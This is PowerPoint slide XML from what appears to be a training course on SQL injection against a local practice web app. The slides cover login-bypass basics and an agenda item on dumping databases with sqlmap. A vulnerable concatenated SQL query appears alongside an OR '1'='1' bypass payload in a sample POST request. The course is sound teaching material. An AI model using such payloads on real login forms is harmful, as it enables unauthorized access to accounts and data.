              </a:rPr>
              <a:t>Then, use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Firefox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> to navigate to the appropriate URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mac</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> http://localhost/vulnerabilities/sqli</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://192.168.99.100/vulnerabilities/sqli</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Log in with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>admin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>password </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>password</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Follow the instructions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endParaRPr lang="en-US"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OR Injection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0226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OR Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12287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BREAK</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3275617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B5B-906B-E442-ABE6-850B27896589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Breakdown of the Day </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{538D1F21-7062-644E-89D2-4E2F1C83D507}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="990600"/>
            <a:ext cx="7543800" cy="5293757"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>SQL Warm-Up</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>: Exercises on SELECT WHERE, AND, and OR</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>Introduction to SQL Injection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>: How malicious user input gets from the browser to the web server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>Login Bypasses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>: How malicious user input can allow you to login without credentials</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0"/>
              <a:t>In-Band Injections with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" b="1" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>: What "in-band" injections are, and how to use `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>` to use them to dump an entire database</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1894104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Login Bypasses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4242084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A basic login form requires you to submit a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> and a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C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98868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The server will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>query the database</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> for a user with this username and password.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C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177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151728"/>
            <a:ext cx="8763000" cy="2554545"/>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The query looks like:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	SELECT * FROM users </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	WHERE username=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	AND password=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="Straight Connector 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A1B44735-B290-4E80-94C7-2131BF680717}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219200" y="2895600"/>
            <a:ext cx="67056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461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If this yields a result, the server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>logs you in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Otherwise, you remain locked out.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C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4396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921169"/>
            <a:ext cx="8763000" cy="1015663"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Injecting an OR clause can “trick” this query into generating results </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>without</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3000" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Helvetica" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> a password!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="3000" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>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7109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94F20-5679-438E-94B7-D21556C04B6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="6538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5C0A43E-6B2C-4A63-96DC-FACD61A8BC26}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4504679"/>
            <a:ext cx="9144000" cy="600721"/>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CA170A7-2FF1-49D1-A607-F3786E0C13E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2590800"/>
            <a:ext cx="9144000" cy="186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50DF54-167B-487C-A869-5CFBE02B800A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="653854"/>
            <a:ext cx="9144000" cy="1860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80EA3D0-2D4F-4858-B9D3-DA27C9F46BBA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6324600" y="370457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FAD2F2-EB85-4C8A-A9AF-73A29236B9C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3811749" y="3694418"/>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31631F-74FC-4EDC-ADCB-D23701ACC706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="320674" y="0"/>
            <a:ext cx="5470526" cy="653854"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Anatomy of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="E04006"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Classic Login Bypass</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6DF2F51-F6FA-4611-B10D-2ACF3B8316D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="762000"/>
            <a:ext cx="3312125"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1 User Submission</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C51B9E08-B81D-4B2D-94CC-2AE7BC354BF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304800" y="2738735"/>
            <a:ext cx="2151551"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2 PHP Code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{435C1F6C-D4F5-4FAE-A3D7-7D42698BCE79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="594252" y="1273497"/>
            <a:ext cx="5561138" cy="1200329"/>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POST /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>getUserInfo.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Host: www.api.example.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name=’+OR+’1’=‘1’;--+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&amp;password=password</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="TextBox 42">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4EE1BD4-F18F-437B-8B2A-B5AF7BB3598C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="228600" y="4567535"/>
            <a:ext cx="5791200" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>3 After Substitution</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="Rectangle: Rounded Corners 48">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2ED68501-EF71-41FB-ACD8-2F3B4108D6C9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="5320656"/>
            <a:ext cx="9144000" cy="92774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$query =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“SELECT * FROM users WHERE name=‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
